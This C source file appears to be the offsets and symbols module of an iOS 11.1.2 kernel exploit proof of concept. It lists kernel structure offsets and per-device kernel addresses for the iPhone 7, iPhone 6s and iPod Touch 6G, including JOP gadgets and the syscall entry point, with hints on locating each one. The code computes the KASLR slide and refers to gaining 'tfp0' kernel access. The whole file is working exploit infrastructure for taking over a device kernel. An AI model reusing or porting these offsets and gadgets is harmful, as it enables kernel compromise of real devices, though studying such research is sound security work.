#include <stdio.h>#include <stdlib.h>#include <sys/sysctl.h>#include <sys/uts

1. #include <stdio.h>
2. #include <stdlib.h>
3. #include <sys/sysctl.h>
4. #include <sys/utsname.h>
5.  
6. #include "symbols.h"
7. #include "kmem.h"
8. #include "kutils.h"
9.  
10. // the offsets are unlikely to change between similar models and builds, but the symbol addresses will
11. // the offsets are required to get the kernel r/w but the symbols aren't
12.  
13. int* offsets = NULL;
14.  
15.  
16. /* iOS 11.1.2 */
17. int kstruct_offsets_15B202[] = {
18. 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
19. 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,
20. 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,
21. 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,
22. 0x28, // KSTRUCT_OFFSET_TASK_NEXT,
23. 0x30, // KSTRUCT_OFFSET_TASK_PREV,
24. 0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
25. 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,
26.  
27. 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
28. 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
29. 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
30. 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
31. 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
32. 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
33. 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
34. 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
35.  
36. 0x10, // KSTRUCT_OFFSET_PROC_PID,
37.  
38. 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE
39.  
40. 0x180, // KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR
41. 0x188, // KSTRUCT_OFFSET_THREAD_LAST_PROCESSOR
42. 0x190, // KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR
43. 0x408, // KSTRUCT_OFFSET_THREAD_CONTEXT_DATA
44. 0x410, // KSTRUCT_OFFSET_THREAD_UPCB
45. 0x418, // KSTRUCT_OFFSET_THREAD_UNEON
46. 0x420, // KSTRUCT_OFFSET_THREAD_KSTACKPTR
47.  
48. 0x54, // KSTRUCT_OFFSET_PROCESSOR_CPU_ID
49.  
50. 0x28, // KSTRUCT_OFFSET_CPU_DATA_EXCEPSTACKPTR
51. 0X78, // KSTRUCT_OFFSET_CPU_DATA_CPU_PROCESSOR
52. };
53.  
54. int koffset(enum kstruct_offset offset) {
55. if (offsets == NULL) {
56. printf("need to call symbols_init() prior to querying offsets\n");
57. return 0;
58. }
59. return offsets[offset];
60. }
61.  
62. // this is the base of the kernel, not the kernelcache
63. uint64_t kernel_base = 0;
64. uint64_t* symbols = NULL;
65. uint64_t kaslr_slide = 0;
66.  
67. // ip7
68. uint64_t ksymbols_iphone_7_15B202[] = {
69. 0xfffffff0074d74cc, // KSYMBOL_OSARRAY_GET_META_CLASS,
70. 0xfffffff007566454, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
71. 0xfffffff007567bfc, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
72. 0xfffffff0073eb130, // KSYMBOL_CSBLOB_GET_CD_HASH
73. 0xfffffff007101248, // KSYMBOL_KALLOC_EXTERNAL
74. 0xfffffff007101278, // KSYMBOL_KFREE
75. 0xfffffff0074d74d4, // KYSMBOL_RET
76. 0xfffffff0074f11cc, // KSYMBOL_OSSERIALIZER_SERIALIZE,
77. 0xfffffff00758c618, // KSYMBOL_KPRINTF
78. 0xfffffff0074fc164, // KSYMBOL_UUID_COPY
79. 0xfffffff0075b2000, // KSYMBOL_CPU_DATA_ENTRIES
80. 0xfffffff0070cc1d4, // KSYMBOL_VALID_LINK_REGISTER
81. 0xfffffff0070cc1ac, // KSYMBOL_X21_JOP_GADGET
82. 0xfffffff0070cc474, // KSYMBOL_EXCEPTION_RETURN
83. 0xfffffff0070cc42c, // KSYMBOL_THREAD_EXCEPTION_RETURN
84. 0xfffffff0071e1998, // KSYMBOL_SET_MDSCR_EL1_GADGET
85. 0xfffffff007439b20, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // this is actually 1 instruction in to the entrypoint
86. 0xfffffff0071de074, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP
87. 0xfffffff0071dea24, // KSYMBOL_SLEH_SYNC_EPILOG
88. };
89.  
90. uint64_t ksymbols_ipod_touch_6g_15b202[] = {
91. 0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS,
92. 0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
93. 0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
94. 0xFFFFFFF0073B71E4, // KSYMBOL_CSBLOB_GET_CD_HASH
95. 0xFFFFFFF0070C8710, // KSYMBOL_KALLOC_EXTERNAL
96. 0xFFFFFFF0070C8740, // KSYMBOL_KFREE
97. 0xFFFFFFF0070C873C, // KYSMBOL_RET
98. 0xFFFFFFF0074BE978, // KSYMBOL_OSSERIALIZER_SERIALIZE,
99. 0xFFFFFFF007559FD0, // KSYMBOL_KPRINTF
100. 0xFFFFFFF0074C9910, // KSYMBOL_UUID_COPY
101. 0xFFFFFFF00757E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
102. 0xFFFFFFF00709818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
103. 0xFFFFFFF007098164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
104. 0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
105. 0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
106. 0xFFFFFFF0071AD144, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
107. 0xFFFFFFF0074062F4, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
108. 0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
109. 0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
110. };
111.  
112. uint64_t ksymbols_iphone_6s_15b202[] = {
113. 0xFFFFFFF00748D548, // KSYMBOL_OSARRAY_GET_META_CLASS,
114. 0xFFFFFFF00751C4D0, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
115. 0xFFFFFFF00751DC78, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
116. 0xFFFFFFF0073A1054, // KSYMBOL_CSBLOB_GET_CD_HASH
117. 0xFFFFFFF0070B8088, // KSYMBOL_KALLOC_EXTERNAL
118. 0xFFFFFFF0070B80B8, // KSYMBOL_KFREE
119. 0xFFFFFFF0070B80B4, // KYSMBOL_RET
120. 0xFFFFFFF0074A7248, // KSYMBOL_OSSERIALIZER_SERIALIZE,
121. 0xFFFFFFF0075426C4, // KSYMBOL_KPRINTF
122. 0xFFFFFFF0074B21E0, // KSYMBOL_UUID_COPY
123. 0xFFFFFFF007566000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
124. 0xFFFFFFF00708818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
125. 0xFFFFFFF007088164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
126. 0xFFFFFFF007088434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
127. 0xFFFFFFF0070883E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
128. 0xFFFFFFF007197AB0, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
129. 0xFFFFFFF0073EFB44, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
130. 0xFFFFFFF0071941D8, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
131. 0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
132. };
133.  
134. uint64_t ksym(enum ksymbol sym) {
135. if (kernel_base == 0) {
136. if (!have_kmem_read()) {
137. printf("attempted to use symbols prior to gaining kernel read\n");
138. return 0;
139. }
140. kernel_base = find_kernel_base();
141. kaslr_slide = find_kernel_base() - 0xFFFFFFF007004000;
142. }
143. //return symbols[sym] + kernel_base;
144. return symbols[sym] + kaslr_slide;
145. }
146.  
147. int have_syms = 0;
148. int probably_have_correct_symbols() {
149. return have_syms;
150. }
151.  
152. void offsets_init() {
153. size_t size = 32;
154. char build_id[size];
155. memset(build_id, 0, size);
156. int err = sysctlbyname("kern.osversion", build_id, &size, NULL, 0);
157. if (err == -1) {
158. printf("failed to detect version (sysctlbyname failed\n");
159. return;
160. }
161. printf("build_id: %s\n", build_id);
162.  
163. struct utsname u = {0};
164. uname(&u);
165.  
166. printf("sysname: %s\n", u.sysname);
167. printf("nodename: %s\n", u.nodename);
168. printf("release: %s\n", u.release);
169. printf("version: %s\n", u.version);
170. printf("machine: %s\n", u.machine);
171.  
172. // set the offsets
173.  
174. if (strcmp(build_id, "15B202") == 0) {
175. offsets = kstruct_offsets_15B202;
176. } else {
177. offsets = kstruct_offsets_15B202;
178. printf("unknown kernel build. If this is iOS 11 it might still be able to get tfp0, trying anyway\n");
179. have_syms = 0;
180. return;
181. }
182.  
183. // set the symbols
184.  
185. if (strstr(u.machine, "iPod7,1")) {
186. printf("this is iPod Touch 6G, should work!\n");
187. symbols = ksymbols_ipod_touch_6g_15b202;
188. have_syms = 1;
189. } else if (strstr(u.machine, "iPhone9,3")) {
190. printf("this is iPhone 7, should work!\n");
191. symbols = ksymbols_iphone_7_15B202;
192. have_syms = 1;
193. } else if (strstr(u.machine, "iPhone8,1")) {
194. printf("this is iPhone 6s, should work!\n");
195. symbols = ksymbols_iphone_6s_15b202;
196. have_syms = 1;
197. } else {
198. printf("no symbols for this device yet\n");
199. printf("tfp0 should still work, but the kernel debugger PoC won't\n");
200. symbols = NULL;
201. have_syms = 0;
202. }
203. }